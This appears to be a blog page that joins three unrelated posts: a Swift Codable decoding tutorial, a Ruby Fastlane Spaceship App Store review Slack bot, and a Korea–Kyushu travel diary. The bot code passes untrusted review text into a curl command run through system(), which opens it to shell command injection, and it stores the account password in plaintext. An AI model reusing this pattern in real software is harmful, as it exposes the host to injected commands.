Since the API EndPoint may not always return complete data fields (only id is guaranteed), all fields except id are Optional. For example, when fetching song information, a complete structure is returned, but when liking a song, only the id
, likeCount
, and like
fields related to the change are returned.
We hope that whatever fields the API Response contains can be stored in Core Data. If the data already exists, update the changed fields (incremental update).
But here lies the problem: After Codable Decoding into an Entity Object, we cannot distinguish between “the data field is intended to be set to nil” and “the Response did not provide it”
1
+2
+3
+4
+5
+
A Response:
+{
+ "id": 1,
+ "file": null
+}
+
For A Response and B Response, the file is null, but the meanings are different; A intends to set the file field to null (clear the original data), while B intends to update other data and simply did not provide the file field.
A developer in the Swift community proposed adding a null Strategy similar to date Strategy in JSONDecoder, allowing us to distinguish the above situations, but there are currently no plans to include it.
As mentioned earlier, our architecture is JSON String -> Entity Object -> NSManagedObject, so when we get the Entity Object, it is already the result after decoding, and there is no raw data to operate on; of course, we can use the original JSON String for comparison, but it would be better not to use Codable in that case.
First, refer to the previous article to use Associated Value Enum as a container to hold values.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+
enum OptionalValue<T: Decodable>: Decodable {
+ case null
+ case value(T)
+ init(from decoder: Decoder) throws {
+ let container = try decoder.singleValueContainer()
+ if let value = try? container.decode(T.self) {
+ self = .value(value)
+ } else {
+ self = .null
+ }
+ }
+}
+
Using generics, T is the actual data field type; .value(T) can hold the decoded value, and .null represents that the value is null.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+
struct Song: Decodable {
+ enum CodingKeys: String, CodingKey {
+ case id
+ case file
+ }
+
+ var id: Int
+ var file: OptionalValue<String>?
+
+ init(from decoder: Decoder) throws {
+ let container = try decoder.container(keyedBy: CodingKeys.self)
+
+ self.id = try container.decode(Int.self, forKey: .id)
+
+ if container.contains(.file) {
+ self.file = try container.decode(OptionalValue<String>.self, forKey: .file)
+ } else {
+ self.file = nil
+ }
+ }
+}
+
+var jsonData = """
+{
+ "id":1
+}
+""".data(using: .utf8)!
+var result = try! JSONDecoder().decode(Song.self, from: jsonData)
+print(result)
+
+jsonData = """
+{
+ "id":1,
+ "file":null
+}
+""".data(using: .utf8)!
+result = try! JSONDecoder().decode(Song.self, from: jsonData)
+print(result)
+
+jsonData = """
+{
+ "id":1,
+ "file":"https://test.com/m.mp3"
+}
+""".data(using: .utf8)!
+result = try! JSONDecoder().decode(Song.self, from: jsonData)
+print(result)
+
The example is simplified to only include
id
andfile
data fields.
The Song Entity implements its own decoding method, using the contains(.KEY)
method to determine whether the response includes the field (regardless of its value). If it does, it decodes it into OptionalValue; within the OptionalValue Enum, it decodes the actual value we want. If the value is successfully decoded, it is placed in .value(T); if the value is null (or decoding fails), it is placed in .null.
This way, we can distinguish whether the field is provided or not, and when writing to Core Data, we can determine whether to update the field to null or not update this field at all.
Optional!Optional! is quite suitable for handling this scenario in Swift.
1
+2
+3
+4
+5
+6
+7
+8
+9
+
struct Song: Decodable {
+ var id: Int
+ var name: String??
+ var file: String??
+ var converImage: String??
+ var likeCount: Int??
+ var like: Bool??
+ var length: Int??
+}
+
However… Codable JSONDecoder Decode handles both Double Optional and Optional with decodeIfPresent, treating both as Optional without special handling for Double Optional; so the result remains the same as before.
Initially, it was thought that Property Wrapper could be used for elegant encapsulation, such as:
1
+
@OptionalValue var file: String?
+
But before delving into the details, it was found that Codable Property fields marked with Property Wrapper require the API response to have that field, otherwise, a keyNotFound error will occur, even if the field is Optional. ?????
There is also a discussion thread on the official forum regarding this issue… It is estimated that this will be fixed in the future.
Therefore, when choosing packages like BetterCodable or CodableWrappers, consider the current issue with Property Wrapper.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+
import Foundation
+
+struct Song: Decodable {
+ enum CodingKeys: String, CodingKey {
+ case id
+ case name
+ case like
+ }
+
+ var id: Int
+ var name: String?
+ var like: Bool?
+
+ init(from decoder: Decoder) throws {
+ let container = try decoder.container(keyedBy: CodingKeys.self)
+ self.id = try container.decode(Int.self, forKey: .id)
+ self.name = try container.decodeIfPresent(String.self, forKey: .name)
+
+ if let intValue = try container.decodeIfPresent(Int.self, forKey: .like) {
+ self.like = (intValue == 1) ? true : false
+ } else if let boolValue = try container.decodeIfPresent(Bool.self, forKey: .like) {
+ self.like = boolValue
+ }
+ }
+}
+
+var jsonData = """
+{
+ "id": 1,
+ "name": "告五人",
+ "like": 0
+}
+""".data(using: .utf8)!
+var result = try! JSONDecoder().decode(Song.self, from: jsonData)
+print(result)
+
Extending the previous section, we can initialize Decode in init
and decode it into int/Bool, then assign it ourselves. This way, we can extend the original fields to accept 0/1/true/false.
If you don’t want to create your own Decoder, you can override the original JSON Decoder to add more functionality.
We can extend KeyedDecodingContainer and define public methods ourselves. Swift will prioritize executing the methods we redefine under the module, overriding the original Foundation implementation.
This affects the entire module.
And it’s not a true override, you can’t call super.decode, and be careful not to call yourself (e.g., decode(Bool.Type, forKey) in decode(Bool.Type, forKey)).
There are two decode methods:
Example 1. The main issue mentioned earlier can be directly extended:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+
extension KeyedDecodingContainer {
+ public func decodeIfPresent<T>(_ type: T.Type, forKey key: Self.Key) throws -> T? where T : Decodable {
+ //better:
+ switch type {
+ case is OptionalValue<String>.Type,
+ is OptionalValue<Int>.Type:
+ return try? decode(type, forKey: key)
+ default:
+ return nil
+ }
+ // or just return try? decode(type, forKey: key)
+ }
+}
+
+struct Song: Decodable {
+ var id: Int
+ var file: OptionalValue<String>?
+}
+
Since the main issue is with Optional data fields and Decodable types, we override the decodeIfPresent<T: Decodable>
method.
It is speculated that the original implementation of decodeIfPresent
returns nil if the data is null or the response does not provide it, without actually running decode.
So the principle is simple: as long as the Decodable Type is OptionValue<T>
, it will try to decode regardless, allowing us to get different state results. But actually, not judging the Decodable Type also works, meaning all Optional fields will try to decode.
Example 2. Problem scenario 1 can also be extended using this method:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+
extension KeyedDecodingContainer {
+ public func decodeIfPresent(_ type: Bool.Type, forKey key: KeyedDecodingContainer<K>.Key) throws -> Bool? {
+ if let intValue = try? decodeIfPresent(Int.self, forKey: key) {
+ return (intValue == 1) ? (true) : (false)
+ } else if let boolValue = try? decodeIfPresent(Bool.self, forKey: key) {
+ return boolValue
+ }
+ return nil
+ }
+}
+
+struct Song: Decodable {
+ enum CodingKeys: String, CodingKey {
+ case id
+ case name
+ case like
+ }
+
+ var id: Int
+ var name: String?
+ var like: Bool?
+}
+
+var jsonData = """
+{
+ "id": 1,
+ "name": "告五人",
+ "like": 1
+}
+""".data(using: .utf8)!
+var result = try! JSONDecoder().decode(Song.self, from: jsonData)
+print(result)
+
Codable has been used in various tricky ways, some of which are quite convoluted because Codable’s constraints are too strong, sacrificing much of the flexibility needed in real-world development. In the end, you might even start to question why you chose Codable in the first place, as the advantages seem to diminish…
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Using Ruby+Fastlane-SpaceShip to build an APP review tracking notification Slack bot
Photo by Austin Distel
I recently discovered that the bot in Slack that forwards the latest APP reviews is a paid service. I always thought this feature was free. The cost ranges from $5 to $200 USD/month because each platform offers more than just the “App Review Bot” feature. They also provide data statistics, records, unified backend, competitor comparisons, etc. The cost is based on the services each platform can provide. The Review Bot is just one part of their offerings, but I only need this feature and nothing else. Paying for it seems wasteful.
I originally used the free open-source tool TradeMe/ReviewMe for Slack notifications, but this tool has been outdated for a long time. Occasionally, Slack would suddenly send out some old reviews, which was quite alarming (many bugs had already been fixed, making us think there were new issues!). The reason was unclear.
So, I considered finding other tools or methods to replace it.
We have now redesigned the App Reviews Bot using the new App Store Connect API and relaunched it as “ ZReviewTender — a free open-source App Reviews monitoring bot “.
====
App Store Connect API now supports reading and managing Customer Reviews. The App Store Connect API natively supports accessing App reviews, no longer requiring Fastlane — Spaceship to fetch reviews from the backend.
With the motivation in place, let’s explore the principles to achieve the goal.
Apple provides the App Store Connect API, but it does not offer a feature to fetch reviews.
[2022/07/20 Update]: App Store Connect API now supports reading and managing Customer Reviews
Apple provides a public APP review RSS subscription URL, and it offers both rss xml and json formats.
1
+
https://itunes.apple.com/country_code/rss/customerreviews/id=APP_ID/page=1/sortBy=mostRecent/json
+
mostRecent/json
requests the latest & json format, you can also change it to mostRecent/xml
for xml format.The returned review data is as follows:
rss.json:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+
{
+ "author": {
+ "uri": {
+ "label": "https://itunes.apple.com/tw/reviews/id123456789"
+ },
+ "name": {
+ "label": "test"
+ },
+ "label": ""
+ },
+ "im:version": {
+ "label": "4.27.1"
+ },
+ "im:rating": {
+ "label": "5"
+ },
+ "id": {
+ "label": "123456789"
+ },
+ "title": {
+ "label": "Great presence!"
+ },
+ "content": {
+ "label": "Life is worth it~",
+ "attributes": {
+ "type": "text"
+ }
+ },
+ "link": {
+ "attributes": {
+ "rel": "related",
+ "href": "https://itunes.apple.com/tw/review?id=123456789&type=Purple%20Software"
+ }
+ },
+ "im:voteSum": {
+ "label": "0"
+ },
+ "im:contentType": {
+ "attributes": {
+ "term": "Application",
+ "label": "Application"
+ }
+ },
+ "im:voteCount": {
+ "label": "0"
+ }
+}
+
Advantages:
Disadvantages:
The biggest problem we encountered is 3; but it is uncertain whether this is an issue with the Bot tool we are using or with the RSS URL data.
This method is somewhat unconventional and was discovered by a sudden inspiration; but after referring to other Review Bot practices, I found that many websites also use it this way, so it should be fine, and I saw tools doing this 4-5 years ago, just didn’t delve into it at the time.
Advantages:
Disadvantages:
Step 1 — Sniff the API that loads the review section of App Store Connect backend:
Get the Apple backend by hitting:
1
+
https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/APP_ID/platforms/ios/reviews?index=0&sort=REVIEW_SORT_ORDER_MOST_RECENT
+
This endpoint retrieves the review list:
index = page offset, up to 100 entries per page.
The returned review data is as follows:
private.json:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+
{
+ "value": {
+ "id": 123456789,
+ "rating": 5,
+ "title": "Great presence!",
+ "review": "Life is worth it~",
+ "created": null,
+ "nickname": "test",
+ "storeFront": "TW",
+ "appVersionString": "4.27.1",
+ "lastModified": 1618836654000,
+ "helpfulViews": 0,
+ "totalViews": 0,
+ "edited": false,
+ "developerResponse": null
+ },
+ "isEditable": true,
+ "isRequired": false,
+ "errorKeys": null
+}
+
After testing, it was found that you only need to include cookie: myacinfo=<Token>
to forge a request and obtain data:
We have the API and the required headers, now we need to automate the retrieval of this cookie information from the backend.
Step Two — The Versatile Fastlane
Since Apple now enforces full Two-Step Verification, automating login verification has become more cumbersome. Fortunately, the clever Fastlane has implemented everything from the official App Store Connect API, iTMSTransporter, to web authentication (including two-step verification). We can directly use Fastlane’s command:
1
+
fastlane spaceauth -u <App Store Connect Account (Email)>
+
This command will complete the web login verification (including two-step verification) and then store the cookie in the FASTLANE_SESSION file.
You will get a string similar to the following:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+
!ruby/object:HTTP::Cookie
+name: myacinfo value: <token>
+domain: apple.com for_domain: true path: "/"
+secure: true httponly: true expires: max_age:
+created_at: 2021-04-21 20:42:36.818821000 +08:00
+accessed_at: 2021-04-21 22:02:45.923016000 +08:00
+!ruby/object:HTTP::Cookie
+name: <hash> value: <token>
+domain: idmsa.apple.com for_domain: true path: "/"
+secure: true httponly: true expires: max_age: 2592000
+created_at: 2021-04-19 23:21:05.851853000 +08:00
+accessed_at: 2021-04-21 20:42:35.735921000 +08:00
+
By including myacinfo = value
, you can obtain the review list.
Step Three — SpaceShip
Initially, I thought Fastlane could only help us up to this point, and we would have to manually integrate the flow of obtaining the cookie from Fastlane and then calling the API. However, after some exploration, I discovered that Fastlane’s authentication module SpaceShip
has even more powerful features!
SpaceShip
SpaceShip already has a method for fetching the review list Class: Spaceship::TunesClient::get_reviews!
1
+2
+
app = Spaceship::Tunes::login(appstore_account, appstore_password)
+reviews = app.get_reviews(app_id, platform, storefront, versionId = '')
+
*storefront = region
Step Four — Assembly
Fastlane and Spaceship are both written in Ruby, so we also need to use Ruby to create this Bot tool.
We can create a reviewBot.rb
file, and to compile and execute it, simply enter in the Terminal:
1
+
ruby reviewBot.rb
+
That’s it. ( *For more Ruby environment issues, refer to the tips at the end)
First, since the original get_reviews method’s parameters do not meet our needs; I want review data for all regions and all versions, without filtering, and with pagination support:
extension.rb:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
# Extension Spaceship->TunesClient
+module Spaceship
+ class TunesClient < Spaceship::Client
+ def get_recent_reviews(app_id, platform, index)
+ r = request(:get, "ra/apps/#{app_id}/platforms/#{platform}/reviews?index=#{index}&sort=REVIEW_SORT_ORDER_MOST_RECENT")
+ parse_response(r, 'data')['reviews']
+ end
+ end
+end
+
So we extend a method in TunesClient, with parameters only including app_id, platform = ios
( all lowercase ), index = pagination offset.
Next, assemble login authentication and fetch the review list:
get_recent_reviews.rb:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+
index = 0
+breakWhile = true
+while breakWhile
+ app = Spaceship::Tunes::login(APPStoreConnect account (Email), APPStoreConnect password)
+ reviews = app.get_recent_reviews($app_id, $platform, index)
+ if reviews.length() <= 0
+ breakWhile = false
+ break
+ end
+ reviews.each { |review|
+ index += 1
+ puts review["value"]
+ }
+end
+
Use while to traverse all pages, and terminate when there is no content.
Next, add a record of the last latest time, and only notify the latest messages that have not been notified:
lastModified.rb:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+
lastModified = 0
+if File.exists?(".lastModified")
+ lastModifiedFile = File.open(".lastModified")
+ lastModified = lastModifiedFile.read.to_i
+end
+newLastModified = lastModified
+isFirst = true
+messages = []
+
+index = 0
+breakWhile = true
+while breakWhile
+ app = Spaceship::Tunes::login(APPStoreConnect account (Email), APPStoreConnect password)
+ reviews = app.get_recent_reviews($app_id, $platform, index)
+ if reviews.length() <= 0
+ breakWhile = false
+ break
+ end
+ reviews.each { |review|
+ index += 1
+ if isFirst
+ isFirst = false
+ newLastModified = review["value"]["lastModified"]
+ end
+
+ if review["value"]["lastModified"] > lastModified && lastModified != 0
+ # Do not send notifications the first time
+ messages.append(review["value"])
+ else
+ breakWhile = false
+ break
+ end
+ }
+end
+
+messages.sort! { |a, b| a["lastModified"] <=> b["lastModified"] }
+messages.each { |message|
+ notify_slack(message)
+}
+
+File.write(".lastModified", newLastModified, mode: "w+")
+
Simply use a .lastModified
to record the time obtained during the last execution.
*Do not send notifications the first time, otherwise, it will spam
The final step, assemble the push message & send it to Slack:
slack.rb:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+
# Slack Bot
+def notify_slack(review)
+ rating = review["rating"].to_i
+ color = rating >= 4 ? "good" : (rating >= 2 ? "warning" : "danger")
+ like = review["helpfulViews"].to_i > 0 ? " - #{review["helpfulViews"]} :thumbsup:" : ""
+ date = review["edited"] == false ? "Created at: #{Time.at(review["lastModified"].to_i / 1000).to_datetime}" : "Updated at: #{Time.at(review["lastModified"].to_i / 1000).to_datetime}"
+
+
+ isResponse = ""
+ if review["developerResponse"] != nil && review["developerResponse"]['lastModified'] < review["lastModified"]
+ isResponse = " (Response outdated)"
+ end
+
+ edited = review["edited"] == false ? "" : ":memo: User updated review#{isResponse}:"
+
+ stars = "★" * rating + "☆" * (5 - rating)
+ attachments = {
+ :pretext => edited,
+ :color => color,
+ :fallback => "#{review["title"]} - #{stars}#{like}",
+ :title => "#{review["title"]} - #{stars}#{like}",
+ :text => review["review"],
+ :author_name => review["nickname"],
+ :footer => "iOS - v#{review["appVersionString"]} - #{review["storeFront"]} - #{date} - <https://appstoreconnect.apple.com/apps/APP_ID/appstore/activity/ios/ratingsResponses|Go To App Store>"
+ }
+ payload = {
+ :attachments => [attachments],
+ :icon_emoji => ":storm_trooper:",
+ :username => "ZhgChgLi iOS Review Bot"
+ }.to_json
+ cmd = "curl -X POST --data-urlencode 'payload=#{payload}' SLACK_WEB_HOOK_URL"
+ system(cmd, :err => File::NULL)
+ puts "#{review["id"]} send Notify Success!"
+ end
+
SLACK_WEB_HOOK_URL
= Incoming WebHook URL
appreviewbot.rb:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+
require "Spaceship"
+require 'json'
+require 'date'
+
+# Config
+$slack_web_hook = "Target notification web hook url"
+$slack_debug_web_hook = "Notification web hook url when the bot has an error"
+$appstore_account = "APPStoreConnect account (Email)"
+$appstore_password = "APPStoreConnect password"
+$app_id = "APP_ID"
+$platform = "ios"
+
+# Extension Spaceship->TunesClient
+module Spaceship
+ class TunesClient < Spaceship::Client
+ def get_recent_reviews(app_id, platform, index)
+ r = request(:get, "ra/apps/#{app_id}/platforms/#{platform}/reviews?index=#{index}&sort=REVIEW_SORT_ORDER_MOST_RECENT")
+ parse_response(r, 'data')['reviews']
+ end
+ end
+end
+
+# Slack Bot
+def notify_slack(review)
+ rating = review["rating"].to_i
+ color = rating >= 4 ? "good" : (rating >= 2 ? "warning" : "danger")
+ like = review["helpfulViews"].to_i > 0 ? " - #{review["helpfulViews"]} :thumbsup:" : ""
+ date = review["edited"] == false ? "Created at: #{Time.at(review["lastModified"].to_i / 1000).to_datetime}" : "Updated at: #{Time.at(review["lastModified"].to_i / 1000).to_datetime}"
+
+
+ isResponse = ""
+ if review["developerResponse"] != nil && review["developerResponse"]['lastModified'] < review["lastModified"]
+ isResponse = " (Customer service response is outdated)"
+ end
+
+ edited = review["edited"] == false ? "" : ":memo: User updated review#{isResponse}:"
+
+ stars = "★" * rating + "☆" * (5 - rating)
+ attachments = {
+ :pretext => edited,
+ :color => color,
+ :fallback => "#{review["title"]} - #{stars}#{like}",
+ :title => "#{review["title"]} - #{stars}#{like}",
+ :text => review["review"],
+ :author_name => review["nickname"],
+ :footer => "iOS - v#{review["appVersionString"]} - #{review["storeFront"]} - #{date} - <https://appstoreconnect.apple.com/apps/APP_ID/appstore/activity/ios/ratingsResponses|Go To App Store>"
+ }
+ payload = {
+ :attachments => [attachments],
+ :icon_emoji => ":storm_trooper:",
+ :username => "ZhgChgLi iOS Review Bot"
+ }.to_json
+ cmd = "curl -X POST --data-urlencode 'payload=#{payload}' #{$slack_web_hook}"
+ system(cmd, :err => File::NULL)
+ puts "#{review["id"]} send Notify Success!"
+ end
+
+begin
+ lastModified = 0
+ if File.exists?(".lastModified")
+ lastModifiedFile = File.open(".lastModified")
+ lastModified = lastModifiedFile.read.to_i
+ end
+ newLastModified = lastModified
+ isFirst = true
+ messages = []
+
+ index = 0
+ breakWhile = true
+ while breakWhile
+ app = Spaceship::Tunes::login($appstore_account, $appstore_password)
+ reviews = app.get_recent_reviews($app_id, $platform, index)
+ if reviews.length() <= 0
+ breakWhile = false
+ break
+ end
+ reviews.each { |review|
+ index += 1
+ if isFirst
+ isFirst = false
+ newLastModified = review["value"]["lastModified"]
+ end
+
+ if review["value"]["lastModified"] > lastModified && lastModified != 0
+ # Do not send notification on first use
+ messages.append(review["value"])
+ else
+ breakWhile = false
+ break
+ end
+ }
+ end
+
+ messages.sort! { |a, b| a["lastModified"] <=> b["lastModified"] }
+ messages.each { |message|
+ notify_slack(message)
+ }
+
+ File.write(".lastModified", newLastModified, mode: "w+")
+rescue => error
+ attachments = {
+ :color => "danger",
+ :title => "AppStoreReviewBot Error occurs!",
+ :text => error,
+ :footer => "*Due to Apple's technical limitations, the precise rating crawling function needs to be re-logged in and set approximately every month. We apologize for the inconvenience."
+ }
+ payload = {
+ :attachments => [attachments],
+ :icon_emoji => ":storm_trooper:",
+ :username => "ZhgChgLi iOS Review Bot"
+ }.to_json
+ cmd = "curl -X POST --data-urlencode 'payload=#{payload}' #{$slack_debug_web_hook}"
+ system(cmd, :err => File::NULL)
+ puts error
+end
+
Additionally, a begin…rescue (try…catch) protection is added. If an error occurs, a Slack notification will be sent for us to check (mostly due to session expiration).
Finally, just add this script to crontab / schedule and other scheduling tools to execute it regularly!
Effect picture:
#important-note-about-session-duration
⚠️Whether free, paid, or self-hosted as mentioned in this article; do not use a developer account, be sure to create a separate App Store Connect account with only “Customer Support” permissions to prevent security issues.
It is recommended to use rbenv to manage Ruby, as the system’s built-in version 2.6 can easily cause conflicts.
If you encounter GEM or Ruby environment errors on macOS Catalina, you can refer to this reply to solve them.
After the above journey, I have a better understanding of how the Slack Bot works and how the iOS App Store crawls review content. I also got to play around with ruby! It feels great to write!
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Boarding the Shin Arashiyama Camellia Cruise from Busan, South Korea to Fukuoka, Japan, visiting Yufuin, Oita, Fukuoka, Shimonoseki, Ijima, and Sasebo; a total of 11 days
Taking advantage of the brief period between the end of a phase of work tasks and the start of a new job to take a short breather in Japan; resigned on 5/30, departed on 6/3, returned on 6/13, new job started on 6/24, timing worked out perfectly, as it was only during the job transition gap that I could take a relatively longer time off (a total of 11 days); this was a solo trip in disguise, teaming up with James Lin (Ex-Binance Android Developer, any job opportunities are welcome to be referred to him) who I traveled with last year to Tokyo; this is my second visit to Kyushu, having visited Fukuoka, Kumamoto, and Nagasaki’s must-see attractions last September; this time mainly covering the places I didn’t get to visit last time; so the itinerary will be different from James’, going separate ways.
**The following are the places visited last time that may not be revisited this time. For those interested in learning more about Kyushu, please refer to my previous travelogue “2023 Kyushu 10-Day Solo Trip”:
For more information, please refer to “2023 Kyushu 10-Day Solo Trip”.
Summarizing the lessons learned from this trip at the beginning, “Traveling freely is a continuous payment of tuition fees (time or money) for learning, the more experience you gain, the fewer pitfalls you will encounter”.
[Japan JR PASS | Kyushu Railway Pass | North Kyushu & South Kyushu & All Kyushu | E-Ticket](https://www.kkday.com/en/product/3494-jr-kyushu-rail-pass?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
[Nagasaki, Japan | Huis Ten Bosch Ticket](https://www.kkday.com/en/product/3988-japan-nagasaki-huis-ten-bosch-ticket?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
[Fukuoka, Japan | Hakata Port - Busan Port | Camellia Line Cargo Passenger Ferry](https://www.kkday.com/en/product/138770-cargo-passenger-ferry-new-camellia-fukuoka-hakata-port-busan-port?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
The main purpose of this trip is to take the Camellia Line Cargo Passenger Ferry from Busan, South Korea to Fukuoka, Japan and visit Yufuin, Oita Beppu, and Miyazaki Prefecture - Takachiho.
The pre-trip plan is as follows: (Planned the day before departure, actual order may not follow the plan, didn’t go to Minami Aso as it was too far)
This time, I bought DJB for internet, 2 days 2GB in Korea, unlimited data for 9 days in Japan, total NT$1,250.
Takachiho Gorge is extremely difficult to reach from Fukuoka, so I directly signed up for the KKDAY Takachiho Gorge Day Tour, which includes transportation, lunch, and a Chinese tour guide, priced at NT$2,272 per person.
✈️ Flights
Price: NT$10,480
🛳️ Cruise New Camellia
Price: Economy/2nd class cabin: shared cabin
NT$1,450 per person
🚅 JR Pass Northern Kyushu Rail Pass (5 Days)
Price: NT$3,042
When using the JR Pass in Kyushu this time, you can take the limited express train directly, except for specific reserved seats, all other seats are in the unreserved car (not crowded, seats available).
From Yufuin no Mori
Hakata to Yufuin was not available, so I could only reserve a seat on Yufu 1
.
Please note that Yufuin no Mori
is different from the regular train (Yufu X
), so when making a reservation, make sure it is for Yufuin no Mori
.
Reservation Method:
You must purchase the JR Pass before making a reservation. Since the only option for travel agency selection is KLOOK, and I was afraid that other agencies might not be able to make reservations (the page says that guests who do not have MCO issued by the above travel agencies should not make any selections. It should be fine), I bought the JR Pass from KLOOK.
1. Go to JR Pass Reservation Homepage:
Scroll down to find “Rail Pass Purchase” -> “Inquiry/Change/Refund”
2. Go to JR Pass Reservation Page :
Select “Register”
Read and agree to the terms, click “Proceed to Next Page”
Enter your email for registration, click “Register”.
Check your email for the temporary password and click the continue link.
1. Select Travel Agency Name: KLOOK
2. KRP Reservation Number/MCO Number
Enter KLOOK to view the JR Pass certificate and copy the following certificate number.
Enter the name on the JR Pass order. According to the instructions, if the voucher is issued by KLOOK, you should enter the first name + last name. So, even though my voucher is written as LI ZXXX CXXX
, you should fill in ZXXX CXXX LI
here.
Enter the temporary password in the email.
After setting the password, you can check and reserve train seats on the homepage during the available reservation time (05:30 to 23:00 Japan time); reservations cannot be made outside of this time.
Yufuin no Mori
is fully booked, so you can only reserve the regular train Yufu 1
, departing at 07:43 and arriving at 10:03.
Continue to the next page to select seat preferences, location, and car.
Enter the start date of using the rail pass.
Enter credit card information to pay the reservation fee (¥1,000 for adults / ¥500 for children per person).
The above is the credit card of the purchaser. When collecting tickets at the counter, you must bring and present the credit card used for payment.
Therefore, please be sure to bring the credit card to collect the tickets ⚠️
Checkout, reservation completed!
Total: $14,291, averaging $1,400 per night. This time, finally managed to stay under $1,500 per night, thanks to Toyoko INN!
During my stay at Toyoko INN in Hiroshima, I signed up for membership. Simply inform the front desk during check-in, fill out some information, pay the one-time membership fee of 1,500 Japanese Yen, take a photo on the spot, and you can start using it.
For using Naver Map in Korea, you can plan your itinerary and routes in advance for easy access:
Visit Japan has now combined entry and customs into one QR code.
Similar to previous trips abroad, when arriving at Taipei Main Station A1 via Airport MRT, I first handle advance check-in to go through immigration directly at the airport. (For flights eligible for advance check-in and regulations, please refer to the official website).
Initially planned to take the Orange Line to transfer at Sanchong for Airport MRT, but the other advance check-in station for Airport MRT is at A3 New Taipei Industrial Park Station, not Sanchong Station, and there are no direct trains from Sanchong, so I opted to transfer at Taipei Main Station.
This time, flying to Busan with China Airlines from Terminal 1.
Upon arrival at the airport, I exchanged currency for Korean Won at the counter. Most ATMs only dispense Japanese Yen, and the airport exchange rate is unfavorable with an additional NT$100 handling fee, so it’s recommended to exchange currency at a bank in advance if time permits.
Completed departure procedures around 13:00.
Bought a crispy chicken lunch upon departure from Terminal 1.
Previously, the scenic rest area was closed when passing by, but this time it was open for a visit, although quite small.
As it was still early, I took the opportunity to rest at the free VIP lounge in Terminal 1, which was not crowded at that time.
The fried chicken at the top is marinated and very delicious, but unfortunately this airport doesn’t offer the “Gua Gua Bao”; also found that all the charging outlets here have been removed, only the shells are left, unable to charge.
Inside, there are both bathrooms and toilets, not many in number (estimated about five), very clean and high-end, and the cleaning staff cleans them in a very timely manner.
Boarding is expected to start around 15:20.
The BR terminal at the first terminal requires a transfer by shuttle bus to the boarding gate for the flight to Busan, and there aren’t many people on this flight to Busan! As shown in the picture, estimated to be less than 30 people.
The flight to Busan operated by China Airlines is on a 737-800 medium-sized aircraft, without entertainment screens, Bye Taiwan!
Can only rely on onboard WiFi to access entertainment content, there are quite a few movies! There’s “Rush”! The airplane meal is Three-Cup Chicken Noodles (quite bad), unexpectedly there is a collaboration between China Airlines, Five Tung Blossoms, and Dinotaeng Quokka, and received a short-tailed kangaroo snack.
Fill out the entry card, customs declaration card, and pre-apply for the quarantine QR Code, if not applied, you will need to fill out an additional quarantine card.
The daytime temperature in South Korea is about 20-25 degrees, it may drop below 20 degrees at night; somewhat like the autumn season in Taiwan.
Around 19:20, went through immigration, picked up luggage, and exited the airport.
At that time, misunderstood the relationship between wowpass and tmoney, thought there were only two cards that combined; my understanding was that wowpass is a cash card that includes value storage, currency exchange, cash withdrawal, and shopping, while tmoney is a transportation card, and wowpass includes tmoney; actually, you only need to buy tmoney and not wowpass, at that time I didn’t figure it out and kept looking for wowpass instead of tmoney, there are no wowpass machines at Gimhae International Airport. Therefore, I first bought a ticket with cash and took the subway all the way to Busan.
From Gimhae Airport to Busan Station, you need to transfer three times on the subway; there weren’t many people getting off, so it wasn’t crowded.
Follow the floor signs to the platform.
Purchase a second ticket to Seomyeon Station.
Transferring from the Green Line to the Orange Line does not require entering or exiting the platform. I was not sure if I could buy a ticket to Busan Station on the Green Line at that time, as I did not pay attention. Therefore, I couldn’t exit at Busan Station and needed manual assistance to exit.
Upon exiting, you will find Dongbang INN Busan Station No. 1 store.
Store your luggage and go out to find food.
